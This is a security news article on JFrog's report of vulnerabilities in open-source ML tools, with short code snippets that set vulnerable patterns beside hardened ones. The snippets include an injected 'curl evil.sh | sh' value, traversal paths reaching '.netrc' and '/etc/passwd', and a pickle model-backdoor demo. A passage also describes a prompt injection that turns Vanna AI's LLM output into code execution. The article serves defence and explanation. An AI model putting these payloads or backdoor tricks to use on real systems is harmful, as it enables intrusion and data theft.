- MLflow identified as the most vulnerable open source ML platform
- Directory traversal flaw allows unauthorized file access in Weave
- ZenML Cloud’s access control issue leads to privilege escalation risk
A recent analysis of the security landscape of machine learning (ML) frameworks shows that ML software is subject to more security vulnerabilities than more mature software categories such as DevOps tools or web servers.
The increasing popularity of machine learning across industries highlights the urgent need to protect machine learning systems, as vulnerabilities can lead to unauthorized access, data exfiltration, and operational compromise.
In the report, JFrog notes an increase in critical vulnerabilities in ML projects such as MLflow. Over the past few months, JFrog has discovered 22 vulnerabilities across 15 open source ML projects. Among these, two categories of vulnerabilities stand out: threats targeting server-side components and privilege escalation risks within machine learning frameworks.
Critical vulnerabilities in machine learning frameworks
The vulnerabilities discovered by JFrog affect key components frequently used in ML workflows and could allow attackers to gain unauthorized access to sensitive files or escalate their permissions within ML environments by abusing the very tools that ML practitioners trust for their flexibility.
One of the prominent vulnerabilities involves Weave, a popular toolkit from Weights & Biases (W&B) that helps track and visualize ML model metrics. The WANDB Weave directory traversal vulnerability (CVE-2024-7340) allows low-privileged users to access arbitrary files across file systems.
This flaw is caused by improper input validation when handling file paths and could allow an attacker to view sensitive files that may contain administrative API keys or other privileged information. This vulnerability could lead to privilege escalation, giving an attacker unauthorized access to resources and compromising the security of the entire machine learning pipeline.
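Weave's actual code is not reproduced here, but the bug class is straightforward to sketch: a file-serving routine joins a user-supplied path to a base directory without canonicalizing it, so "../" sequences (or an absolute path) escape the intended root. A minimal, hypothetical illustration with a hardened variant:

```python
from pathlib import Path

BASE_DIR = Path("/srv/artifacts")  # hypothetical artifact store root

def read_artifact_unsafe(relative_path: str) -> bytes:
    # Vulnerable pattern: the user-supplied path is joined directly, so
    # "../../home/admin/.netrc" (or "/etc/passwd") escapes BASE_DIR.
    return (BASE_DIR / relative_path).read_bytes()

def read_artifact_safe(relative_path: str) -> bytes:
    # Hardened pattern: resolve the path and verify it stays inside BASE_DIR.
    target = (BASE_DIR / relative_path).resolve()
    if not target.is_relative_to(BASE_DIR.resolve()):
        raise PermissionError("path escapes the artifact store")
    return target.read_bytes()
```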
ZenML, the MLOps pipeline management tool, is also affected by a critical vulnerability that compromises its access control system. This flaw could allow an attacker with minimal access privileges to escalate their privileges in ZenML Cloud, a hosted deployment of ZenML, and gain access to restricted information, including confidential secrets or model files.
Access control issues in ZenML put the system at significant risk, as escalated privileges could allow attackers to manipulate ML pipelines, tamper with model data, or access sensitive operational data, potentially impacting production environments that rely on these pipelines.
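The report does not spell out ZenML's internal logic, but broken access control of this kind usually comes down to a server-side handler that applies a role change or serves a resource without verifying that the caller is entitled to it. A purely hypothetical sketch of the pattern:

```python
from dataclasses import dataclass

@dataclass
class User:
    name: str
    role: str  # e.g. "viewer", "editor", "admin"

def change_role_unsafe(caller: User, target: User, new_role: str) -> None:
    # Vulnerable pattern: the request is honored without checking that the
    # caller is authorized, so a low-privileged user can grant themselves admin.
    target.role = new_role

def change_role_safe(caller: User, target: User, new_role: str) -> None:
    # Hardened pattern: only admins may change roles.
    if caller.role != "admin":
        raise PermissionError("only admins may change roles")
    target.role = new_role
```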
Another critical vulnerability, Deep Lake Command Injection (CVE-2024-6507), has been discovered in the Deep Lake database, a data storage solution optimized for AI applications. This vulnerability allows an attacker to execute arbitrary commands by leveraging the way Deep Lake handles the import of external datasets.
Due to improper command sanitization, an attacker could achieve remote code execution, compromising the security of the database and any connected applications.
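Deep Lake's implementation is not shown here, but command injection generally follows the same shape: untrusted input is interpolated into a shell command string. A minimal sketch with a hypothetical dataset-import helper, plus the safer form:

```python
import subprocess

def import_dataset_unsafe(dataset_uri: str) -> None:
    # Vulnerable pattern: the URI is interpolated into a shell command, so a
    # value like "http://x; curl evil.sh | sh" injects an extra command.
    subprocess.run(f"wget {dataset_uri} -O /tmp/dataset", shell=True, check=True)

def import_dataset_safe(dataset_uri: str) -> None:
    # Hardened pattern: pass arguments as a list and avoid the shell entirely.
    subprocess.run(["wget", dataset_uri, "-O", "/tmp/dataset"], check=True)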
A noteworthy vulnerability was also discovered in Vanna AI, a tool designed for natural language SQL query generation and visualization. Vanna.AI prompt injection (CVE-2024-5565) allows an attacker to inject malicious instructions into the prompts the tool processes. The vulnerability could lead to remote code execution, allowing an attacker to abuse Vanna AI's SQL-to-graph visualization capabilities to manipulate visualizations, perform SQL injection, or steal data.
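The root cause of this class of issue is that model-generated output is executed without a sandbox: a crafted prompt steers the LLM into emitting code, which the tool then runs. A hypothetical sketch of the dangerous pattern (not Vanna AI's actual code):

```python
def render_chart_unsafe(llm_generated_code: str) -> None:
    # Vulnerable pattern: code produced by the LLM from a user prompt is
    # executed in-process, so a prompt that coaxes the model into emitting
    # "__import__('os').system(...)" becomes remote code execution.
    exec(llm_generated_code)

def render_chart_safer(llm_generated_code: str) -> None:
    # Safer pattern: never exec model output in-process; run it in a
    # locked-down sandbox (separate process, no network, restricted
    # filesystem) or emit a declarative chart spec instead of code.
    raise NotImplementedError("execute generated code only inside a sandbox")
```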
Mage.AI, an MLOps tool for managing data pipelines, has been found to have multiple vulnerabilities, including unauthorized shell access, arbitrary file leaks, and weak path traversal checks.
These issues allow attackers to control data pipelines, expose sensitive configurations, and even execute malicious commands. The combination of these vulnerabilities poses a high risk of privilege escalation and breach of data integrity, compromising the security and stability of machine learning pipelines.
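A "weak" path traversal check typically means a denylist-style filter that can be bypassed instead of a proper canonicalization-and-containment check. A hypothetical illustration of why such filters fail:

```python
from pathlib import Path

PIPELINE_DIR = Path("/srv/pipelines")  # hypothetical pipeline config root

def load_config_weak_check(name: str) -> str:
    # Weak check: stripping "../" once can be bypassed with "....//"
    # (which collapses back to "../") or with an absolute path.
    cleaned = name.replace("../", "")
    return (PIPELINE_DIR / cleaned).read_text()

def load_config_strict(name: str) -> str:
    # Stronger check: canonicalize the path and verify containment.
    target = (PIPELINE_DIR / name).resolve()
    if not target.is_relative_to(PIPELINE_DIR.resolve()):
        raise PermissionError("path escapes the pipeline directory")
    return target.read_text()
```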
By gaining administrative access to a machine learning database or registry, an attacker can embed malicious code in a model, causing a backdoor to be launched when the model is loaded. When models are used by different teams and CI/CD pipelines, this can impact downstream processes. Attackers can also steal sensitive data or conduct model poisoning attacks to reduce model performance or manipulate output.
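In Python-based ML stacks, models serialized with pickle are a common carrier for such backdoors, because unpickling can execute attacker-controlled code. A minimal, benign demonstration of the mechanism (the payload here only prints a message):

```python
import pickle

class BackdooredModel:
    # __reduce__ tells pickle to call an arbitrary callable on load; a real
    # attack would invoke os.system or download a second stage, but this
    # demo only prints to keep it harmless.
    def __reduce__(self):
        return (print, ("payload executed on model load",))

blob = pickle.dumps(BackdooredModel())

# Anyone who loads this "model" runs the embedded payload.
pickle.loads(blob)  # prints: payload executed on model load
```

Mitigations include loading models only from trusted registries, verifying signatures or hashes, and preferring serialization formats that do not execute code on load.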
JFrog’s findings highlight operational gaps in MLOps security. Many organizations lack strong integration of AI/ML security practices with broader cybersecurity strategies, leaving potential blind spots. As machine learning and artificial intelligence continue to drive significant advancements in the industry, protecting the frameworks, datasets and models that drive these innovations is critical.